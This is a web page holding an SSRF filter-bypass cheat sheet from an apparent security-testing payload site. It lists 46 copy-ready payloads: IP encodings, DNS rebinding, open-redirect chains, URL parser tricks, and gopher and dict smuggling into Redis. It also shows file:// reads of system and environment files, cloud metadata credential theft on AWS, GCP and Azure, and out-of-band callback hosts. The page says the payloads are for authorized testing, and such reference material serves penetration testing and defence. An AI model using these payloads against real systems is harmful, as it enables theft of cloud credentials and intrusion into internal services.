SSRF Filter Bypass Cheat Sheet

Techniques to defeat SSRF allowlists and blocklists: IP encodings, DNS rebinding, open-redirect chaining, alternate URL schemes, and reaching cloud metadata behind broken filters. (46 payloads)

Try it interactively with the IP / CIDR Calculator

IP Address Encodings

(8)

http://2130706433/

127.0.0.1 as a 32-bit decimal integer. inet_aton() and most HTTP libraries accept it; a regex looking for '127.0.0.1' never matches.Decimal

http://0x7f000001/

127.0.0.1 as a packed hex integer. Also works split per-octet: 0x7f.0x0.0x0.0x1.Hex

http://0177.0.0.1/

Leading-zero octal for the first octet. 0177 = 127. Combine octets: 0177.0.0.01.Octal

http://0x7f.1/

Mixed hex + class-A shorthand. inet_aton expands the trailing 1 to 0.0.1, giving 127.0.0.1.Mixed/short

http://127.1/

Class-A dotted shorthand — two parts expand to 127.0.0.1. Also 127.0.1 (three parts).Shorthand

http://0/

Bare 0 resolves to 0.0.0.0 on most stacks, which routes to localhost on Linux. Smallest localhost bypass.0.0.0.0

http://[::1]/ http://[::ffff:127.0.0.1]/ http://[0:0:0:0:0:ffff:7f00:1]/

IPv6 loopback and IPv4-mapped IPv6. Filters that only validate IPv4 dotted-quads miss these entirely.IPv6

http://2852039166/ → 169.254.169.254 = http://0xa9fea9fe/

Decimal and hex encodings of the AWS metadata IP. Encode any blocked target, not just 127.0.0.1.Metadata IP

DNS-Based Bypasses

(6)

http://127.0.0.1.nip.io/ http://169.254.169.254.nip.io/

Wildcard DNS services (nip.io, sslip.io) resolve any embedded IP. Defeats hostname-only allowlists with a name that doesn't string-match an IP.Wildcard DNS

http://localtest.me/ http://customer1.app.localhost.my.company.127.0.0.1.nip.io/

Public names that resolve to 127.0.0.1. Useful when the filter blocks the literal string 'localhost'/'127.0.0.1' but trusts arbitrary hostnames.Resolves-to-loopback

TTL=0 record flipping (allowed.com → 169.254.169.254)

DNS rebinding: serve a public/allowed IP on the first lookup (passes validation), then a 0-TTL record so the fetch resolves to an internal IP. Classic TOCTOU between validate and request.DNS rebinding

rebinder: 7f000001.a9fea9fe.rbndr.us

Public rebinding service that alternates between two encoded IPs on successive queries — here 127.0.0.1 and 169.254.169.254. No infra to host.rbndr.us

Singularity of Origin / taviso rbndr payload host

Self-hosted DNS rebinding frameworks tune the flip timing to land between the validation DNS call and the connect() so the SSRF resolves internal.Tooling

internal CNAME / split-horizon name (intranet.corp.example.com)

An allowlisted public hostname whose internal DNS view points at an RFC1918 host. The app trusts the name; resolution differs inside the perimeter.Split-horizon

Redirect & Open-Redirect Chaining

(6)

https://allowed-host.com/redirect?url=http://169.254.169.254/latest/meta-data/

Validation runs on the allowlisted URL; the server then follows a 302 to the internal target. The single most reliable allowlist bypass.302 chain

HTTP/1.1 302 Found\nLocation: http://127.0.0.1:6379/

Host a server that returns a redirect to an internal address. The SSRF client validates your domain, fetches it, and follows the Location header inward.Attacker-controlled redirect

Location: gopher://127.0.0.1:6379/_<redis payload>

Redirect from an allowed HTTPS endpoint into a non-HTTP scheme to smuggle a protocol the filter would have rejected up front.Scheme switch via redirect

redirect to http://[::ffff:a9fe:a9fe]/latest/meta-data/

Combine a redirect with an encoded IP so even a post-redirect re-check (if any) using IPv4 string matching is evaded.Redirect + encoding

30x loop: a.com → b.com → 169.254.169.254

Multi-hop chains defeat shallow checks that only inspect the first hop or cap at one redirect. Watch the app's max-redirects setting.Multi-hop

Refresh: 0; url=http://169.254.169.254/ (meta-refresh / Refresh header)

Some fetch clients and headless renderers honor meta-refresh or the Refresh response header as a redirect, bypassing Location-only filtering.Non-3xx redirect

URL Parser Confusion

(8)

http://[email protected]/

Everything before @ is userinfo. A regex anchoring on 'expected-host.com' passes, but the browser/lib connects to 169.254.169.254.Userinfo

http://169.254.169.254#@expected-host.com/

Fragment trick — the # ends the authority. The real host is the metadata IP; the allowed host is dead text in the fragment.Fragment

http://169.254.169.254?x=expected-host.com

Query-string padding so a naive 'contains allowed domain' check passes while the authority is the internal IP.Query

http://expected-host.com\@169.254.169.254/

Backslash before @ — RFC parsers and some libs (curl, Go, browsers) disagree on whether \ ends the host, producing parser differential confusion.Backslash

http://169.254.169.254%2f%[email protected]/ / http://169.254.169.254%00.expected-host.com/

Encoded slashes and an embedded null byte truncate or reshape the authority differently across parsers, landing on the internal host.Encoding/null

http://expected-host.com:80\@\@169.254.169.254/

Double-@ and port noise to break simplistic split-on-@ logic that takes the first or last segment inconsistently.Double-@

http://169。254。169。254/ / http://①⑥⑨.②⑤④.①⑥⑨.②⑤④

Unicode fullwidth/ideographic dots and circled digits that NFKC-normalize to ASCII during resolution but slip past ASCII regex filters.Unicode

ParserA (validator) vs ParserB (HTTP client)

Core idea: exploit the gap between the library that validates the URL and the one that fetches it (e.g. urllib vs requests, WHATWG vs RFC3986). See Orange Tsai's 'A New Era of SSRF'.Differential

Alternate Schemes & Protocol Smuggling

(6)

file:///etc/passwd / file:///proc/self/environ

If the fetcher allows file://, read local files and process env (often holds tokens/secrets). Bypasses any http(s)-only host filter by abandoning HTTP.file://

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A...

Gopher sends arbitrary bytes to a TCP port — craft full Redis/Memcached/SMTP/HTTP requests. Turns a read-only SSRF into one-way write to internal services.gopher://

dict://127.0.0.1:6379/INFO / dict://127.0.0.1:11211/stat

DICT protocol pokes a port with simple text commands — quick blind banner-grab / interaction with Redis & Memcached when gopher is filtered.dict://

http://169.254.169.254\t/latest/ / ht\ntp://... / HtTp://

Tab/newline injection inside the scheme or scheme-case mangling to dodge case-sensitive 'starts-with http' allow/deny checks before normalization.Scheme obfuscation

ldap://127.0.0.1:389/ / tftp://attacker/x / sftp://internal

Less-common schemes that some SSRF sinks (Java, libcurl) still honor. Enumerate what the backend library supports — curl alone speaks ~25 schemes.Other schemes

jar:http://169.254.169.254!/ / netdoc:/etc/passwd / http+unix:///var/run/docker.sock

JVM-specific (jar:, netdoc:) and Unix-socket schemes reach the Docker API or other internal sockets when the runtime's URL handlers are exposed.JVM / unix-socket

Cloud Metadata Reach

(7)

http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>

AWS IMDSv1 — returns temporary AccessKey/SecretKey/Token. Reachable any time IMDSv2 isn't enforced. Encode the IP (0xa9fea9fe) to beat string filters.AWS IMDSv1

PUT /latest/api/token X-aws-ec2-metadata-token-ttl-seconds: 21600 → then GET with X-aws-ec2-metadata-token

IMDSv2 needs a PUT to mint a token plus a custom header on the GET. Only exploitable if the SSRF lets you control method and headers (e.g. via gopher).AWS IMDSv2

http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token (Metadata-Flavor: Google)

GCP requires the Metadata-Flavor: Google header — a header-injection or gopher SSRF is usually needed. Also try ?alt=json and the recursive=true tree.GCP

http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/  (Metadata: true)

Azure IMDS returns a managed-identity bearer token; requires the Metadata: true header. Pivot to ARM with the token for broad access.Azure

http://100.100.100.200/latest/meta-data/ (Alibaba) / http://169.254.169.254/openstack/latest/meta_data.json

Non-AWS metadata endpoints. Alibaba uses a different IP; OpenStack exposes a JSON blob often containing injected user-data and keys.Other clouds

http://169.254.169.254/latest/user-data / GCP .../instance/attributes/startup-script

User-data / startup scripts frequently embed hardcoded credentials, bootstrap tokens, and config — high value even without an IAM role attached.User-data

Reach via redirect: https://allowed.com/r?u=http://169.254.169.254/... + DNS rebind 169-254-169-254.rebind

When the IP is blocked outright, combine an open redirect or DNS rebinding (above) with the metadata path — most real-world cloud SSRF chains do exactly this.Chained reach

Blind SSRF & Detection

(5)

http://<id>.oast.fun / http://<sub>.burpcollaborator.net

When there's no response body, point the fetch at an out-of-band callback host and watch for DNS + HTTP hits to confirm the request fired and observe the source IP.OOB confirm

DNS-only canary: http://<id>.dns.oast.live

Egress firewalls often block outbound HTTP but allow DNS. A DNS pingback still proves resolution happened even when full HTTP can't leave the box.DNS-only egress

timing oracle: http://127.0.0.1:22 (open) vs http://127.0.0.1:81 (closed)

Differential response time / error between open and closed ports turns a blind SSRF into an internal port scanner without any reflected output.Port scan

differential errors: 'connection refused' vs TLS error vs timeout

Distinct error strings or status codes per target let you map live internal hosts and services purely from the app's reaction.Error oracle

headless PDF/screenshot, webhook, avatar-import, og:image, XXE→SSRF sinks

SSRF hides in PDF/HTML renderers, webhook URLs, 'import from URL', link unfurlers, and XML parsers. Fuzz every field that takes a URL or file reference.Where to look

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

SSRF Cheat Sheet Open Redirect Cheat Sheet WAF Bypass Cheat Sheet CORS Misconfiguration Cheat Sheet

Frequently asked questions

What is the SSRF Filter Bypass Cheat Sheet?+

It's a quick-reference collection of 46 SSRF Bypass payloads for testing SSRF Filter Bypass vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these SSRF Bypass payloads?+

Copy any payload straight into your authorized test, or use the IP / CIDR Calculator to apply them interactively. Only test systems you have explicit permission to assess.

Are these SSRF Bypass payloads free to use?+

Yes — this cheat sheet and all SSRF Bypass payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the SSRF Filter Bypass Cheat Sheet?+

How do I use these SSRF Bypass payloads?+

Copy any payload straight into your authorized test, or use the IP / CIDR Calculator to apply them interactively. Only test systems you have explicit permission to assess.

Are these SSRF Bypass payloads free to use?+

Yes — this cheat sheet and all SSRF Bypass payloads are completely free, with no account required. Everything runs in your browser.

SSRF Filter Bypass Cheat Sheet

IP Address Encodings

DNS-Based Bypasses

Redirect & Open-Redirect Chaining

URL Parser Confusion

Alternate Schemes & Protocol Smuggling

Cloud Metadata Reach

Blind SSRF & Detection

Related Tools

Related Cheat Sheets

Frequently asked questions

SSRF Filter Bypass Cheat Sheet

IP Address Encodings

DNS-Based Bypasses

Redirect & Open-Redirect Chaining

URL Parser Confusion

Alternate Schemes & Protocol Smuggling

Cloud Metadata Reach

Blind SSRF & Detection

Related Tools

Related Cheat Sheets

Frequently asked questions